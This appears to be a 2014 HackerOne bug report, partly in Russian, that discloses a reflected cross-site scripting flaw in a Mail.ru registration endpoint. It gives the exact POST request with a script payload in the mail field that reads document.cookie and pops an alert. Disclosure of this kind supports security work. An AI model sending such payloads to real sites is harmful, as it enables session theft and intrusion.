Mail.ru: Reflected XSS

2014-06-08T19:22:21
ID H1:15654
Type hackerone
Reporter bigbear
Modified 2014-08-07T14:09:42

Description

Уязвимость существует на сайте http://aa.mail.ru/

в сценарии http://aa.mail.ru/dynamic/user/?a=register

Посылаем такой пакет данных [POST]
mail=<script>alert(document.cookie)</script>&mailru_domains=mail.ru&password_mailru=&password_general=&name=kaktakoaddd

Получаем активный alert()